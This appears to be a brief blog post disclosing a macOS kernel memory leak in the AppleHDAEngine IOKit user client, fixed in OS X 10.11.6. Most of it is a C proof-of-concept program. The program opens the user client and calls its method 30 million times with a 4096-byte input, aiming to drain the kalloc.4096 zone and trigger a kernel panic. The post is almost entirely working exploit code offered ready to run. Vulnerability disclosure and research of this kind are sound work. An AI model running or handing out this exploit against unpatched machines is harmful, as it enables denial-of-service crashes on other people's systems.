DspFunc memory leak fixed in OSX 10.11.6

See PoC as below

 

PoC

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <IOKit/IOKitLib.h>
int main(){
    kern_return_t err;
    CFMutableDictionaryRef matching = IOServiceMatching(“AppleHDAEngine”);
    if(!matching){
        printf(“unable to create service matching dictionary\n”);
        return 0;
    }
    io_iterator_t iterator;
    err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
    if (err != KERN_SUCCESS){
        printf(“no matches\n”);
        return 0;
    }
    io_service_t service = IOIteratorNext(iterator);
    if (service == IO_OBJECT_NULL){
        printf(“unable to find service\n”);
        return 0;
    }
    io_connect_t conn = MACH_PORT_NULL;
    err = IOServiceOpen(service, mach_task_self(), 2, &conn);
    if (err != KERN_SUCCESS){
        printf(“unable to get user client connection\n”);
        return 0;
    }else{
        printf(“got userclient connection: %x, type:%d\n”, conn, 0);
    }
    uint64_t inputScalar[8];
    uint32_t inputScalarCnt = 0;
    char inputStruct[4096];
    size_t inputStructCnt = 0x1000;
    uint64_t outputScalar[8];
    uint32_t outputScalarCnt = 0;
    char outputStruct[4096];
    size_t outputStructCnt = 4;
    //fill input
    memset(inputStruct, ‘a’, 0x1000);
    inputStruct[0x1000-1]=’\0′;
    printf(“trying to leak memory of zone kalloc.4096\n”);
    printf(“please wait for few seconds.\n”);
    uint64_t count=0;
    do {
        if (count % 1000 == 0) {
            printf(“. “);
        }
        IOConnectCallMethod(
                            conn,
                            0,
                            inputScalar,
                            inputScalarCnt,
                            inputStruct,
                            inputStructCnt,
                            outputScalar,
                            &outputScalarCnt,
                            outputStruct,
                            &outputStructCnt);
    } while (++count<30000000);
    printf(“panic?\n”);
    return 0;
}

发表评论